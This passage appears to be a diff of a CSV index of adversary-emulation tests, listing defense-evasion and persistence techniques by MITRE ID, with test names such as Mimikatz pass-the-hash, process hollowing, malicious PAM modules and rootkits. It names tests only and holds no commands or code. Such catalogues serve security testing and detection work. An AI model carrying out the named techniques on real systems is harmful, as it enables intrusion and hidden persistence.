defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell
defense-evasion,T1027,Obfuscated Files or Information,8,Obfuscated Command Line using special Unicode characters,e68b945c-52d0-4dd9-a5e8-d173d70c448f,manual
defense-evasion,T1218.008,Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1134.004,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
defense-evasion,T1134.004,Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
@@ -572,17 +391,11 @@ defense-evasion,T1134.004,Parent PID Spoofing,4,Parent PID Spoofing - Spawn from
defense-evasion,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
defense-evasion,T1550.002,Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
defense-evasion,T1550.002,Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
defense-evasion,T1550.002,Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
defense-evasion,T1550.003,Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
defense-evasion,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
defense-evasion,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
defense-evasion,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell
defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt
defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
@@ -590,7 +403,6 @@ defense-evasion,T1218.010,Regsvr32,1,Regsvr32 local COM scriptlet execution,449a
defense-evasion,T1218.010,Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt
defense-evasion,T1218.010,Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt
defense-evasion,T1218.010,Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt
defense-evasion,T1218.010,Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt
defense-evasion,T1036.003,Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt
defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
defense-evasion,T1036.003,Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt
@@ -600,58 +412,38 @@ defense-evasion,T1036.003,Rename System Utilities,6,Masquerading - non-windows e
defense-evasion,T1036.003,Rename System Utilities,7,Masquerading - windows exe running as different windows exe,c3d24a39-2bfe-4c6a-b064-90cd73896cb0,powershell
defense-evasion,T1036.003,Rename System Utilities,8,Malicious process Masquerading as LSM.exe,83810c46-f45e-4485-9ab6-8ed0e9e6ed7f,command_prompt
defense-evasion,T1036.003,Rename System Utilities,9,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt
defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
defense-evasion,T1207,Rogue Domain Controller,1,DCShadow - Mimikatz,0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,manual
defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh
defense-evasion,T1014,Rootkit,2,Loadable Kernel Module based Rootkit,75483ef8-f10f-444a-bf02-62eb0e48db6f,sh
defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,2,Create and start VirtualBox virtual machine,88b81702-a1c0-49a9-95b2-2dd53d755767,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,3,Create and start Hyper-V virtual machine,fb8d4d7e-f5a4-481c-8867-febf13f8b6d3,powershell
defense-evasion,T1014,Rootkit,3,Windows Signed Driver Rootkit Test,8e4e1985-9a19-4529-b4b8-b7a49ff87fae,command_prompt
defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt
defense-evasion,T1218.011,Rundll32,5,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt
defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt
defense-evasion,T1218.011,Rundll32,7,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt
defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt
defense-evasion,T1218.011,Rundll32,9,Execution of non-dll using rundll32.exe,ae3a8605-b26e-457c-b6b3-2702fd335bac,powershell
defense-evasion,T1218.011,Rundll32,10,Rundll32 with Ordinal Value,9fd5a74b-ba89-482a-8a3e-a5feaa3697b0,command_prompt
defense-evasion,T1218.011,Rundll32,11,Rundll32 with Control_RunDLL,e4c04b6f-c492-4782-82c7-3bf75eb8077e,command_prompt
defense-evasion,T1218.011,Rundll32,12,Rundll32 with desk.cpl,83a95136-a496-423c-81d3-1c6750133917,command_prompt
defense-evasion,T1134.005,SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1548.001,Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
defense-evasion,T1548.001,Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,2,SyncAppvPublishingServer - Execute arbitrary PowerShell code,d590097e-d402-44e2-ad72-2c6aa1ce78b1,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,3,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,4,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt
defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,9,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
defense-evasion,T1218,Signed Binary Proxy Execution,10,Load Arbitrary DLL via Wuauclt (Windows Update Client),49fbd548-49e9-4bb7-94a6-3769613912b8,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
defense-evasion,T1027.002,Software Packing,1,Binary simply packed by UPX (linux),11c46cd8-e471-450e-acb8-52a1216ae6a4,sh
defense-evasion,T1027.002,Software Packing,2,"Binary packed by UPX, with modified headers (linux)",f06197f8-ff46-48c2-a0c6-afc1b50665e1,sh
defense-evasion,T1027.002,Software Packing,3,Binary simply packed by UPX,b16ef901-00bb-4dda-b4fc-a04db5067e20,sh
defense-evasion,T1027.002,Software Packing,4,"Binary packed by UPX, with modified headers",4d46e16b-5765-4046-9f25-a600d3e65e4d,sh
defense-evasion,T1036.006,Space after Filename,1,Space After Filename (Manual),89a7dd26-e510-4c9f-9b15-f3bae333360f,manual
defense-evasion,T1036.006,Space after Filename,2,Space After Filename,b95ce2eb-a093-4cd8-938d-5258cef656ea,bash
defense-evasion,T1036.006,Space after Filename,1,Space After Filename,89a7dd26-e510-4c9f-9b15-f3bae333360f,manual
defense-evasion,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
defense-evasion,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
defense-evasion,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
defense-evasion,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
defense-evasion,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
defense-evasion,T1497.001,System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
defense-evasion,T1221,Template Injection,1,WINWORD Remote Template Injection,1489e08a-82c7-44ee-b769-51b72d03521d,command_prompt
defense-evasion,T1070.006,Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
defense-evasion,T1070.006,Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
defense-evasion,T1070.006,Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
@@ -665,162 +457,22 @@ defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token d
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt
defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,powershell
defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt
defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt
defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt
defense-evasion,T1220,XSL Script Processing,4,WMIC bypass using remote XSL file,7f5be499-33be-4129-a560-66021f379b9b,command_prompt
persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell
persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell
persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
persistence,T1098,Account Manipulation,4,Azure - adding user to Azure AD role,0e65ae27-5385-46b4-98ac-607a8ee82261,powershell
persistence,T1098,Account Manipulation,5,Azure - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
persistence,T1098,Account Manipulation,8,AzureAD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
persistence,T1098,Account Manipulation,9,Password Change on Directory Service Restore Mode (DSRM) Account,d5b886d9-d1c7-4b6e-a7b0-460041bf2823,command_prompt
persistence,T1137.006,Add-ins,1,Code Executed Via Excel Add-in File (Xll),441b1a0f-a771-428a-8af0-e99e4698cda3,powershell
persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
persistence,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
persistence,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
persistence,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell
persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
persistence,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
persistence,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt
persistence,T1136.003,Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
persistence,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
persistence,T1546.015,Component Object Model Hijacking,1,COM Hijacking - InprocServer32,48117158-d7be-441b-bc6a-d9e36e47b52b,powershell
persistence,T1546.015,Component Object Model Hijacking,2,Powershell Execute COM Object,752191b1-7c71-445c-9dbe-21bb031b18eb,powershell
persistence,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt
persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt
persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
persistence,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
persistence,T1136.002,Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
persistence,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh
persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt
persistence,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt
persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
persistence,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash
persistence,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash
persistence,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash
persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Local Account,2,Create a user account on a MacOS system,01993ba5-1da3-4e15-a719-b690d4f0f0b2,bash
persistence,T1136.001,Local Account,3,Create a new user in a command prompt,6657864e-0323-4206-9344-ac9cd7265a4f,command_prompt
persistence,T1136.001,Local Account,4,Create a new user in PowerShell,bc8be0ac-475c-4fbf-9b1d-9fffd77afbde,powershell
persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1136.001,Local Account,6,Create a new Windows admin user,fda74566-a604-4581-a4cc-fbbe21d66559,command_prompt
persistence,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
persistence,T1078.003,Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
persistence,T1037.002,Logon Script (Mac),1,Logon Scripts - Mac,f047c7de-a2d9-406e-a62b-12a09d9516f4,manual
persistence,T1037.001,Logon Script (Windows),1,Logon Scripts,d6042746-07d4-4c92-9ad8-e644c114a231,command_prompt
persistence,T1546.007,Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
persistence,T1137,Office Application Startup,1,Office Application Startup - Outlook as a C2,bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c,command_prompt
persistence,T1137.002,Office Test,1,Office Application Startup Test Persistence,c3e35b58-fe1c-480b-b540-7600fb612563,command_prompt
persistence,T1137.004,Outlook Home Page,1,Install Outlook Home Page Persistence,7a91ad51-e6d2-4d43-9471-f26362f5738e,command_prompt
persistence,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell
persistence,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
persistence,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
persistence,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt
persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
persistence,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash
persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual
persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh
persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt
persistence,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt
persistence,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file run from startup Folder,2cb98256-625e-4da9-9d44-f2e5f90b8bd5,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
persistence,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
persistence,T1547.001,Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell
persistence,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell
persistence,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
persistence,T1053.005,Scheduled Task,7,Scheduled Task Executing Base64 Encoded Commands From Registry,e895677d-4f06-49ab-91b6-ae3742d0a2ba,command_prompt
persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt
persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
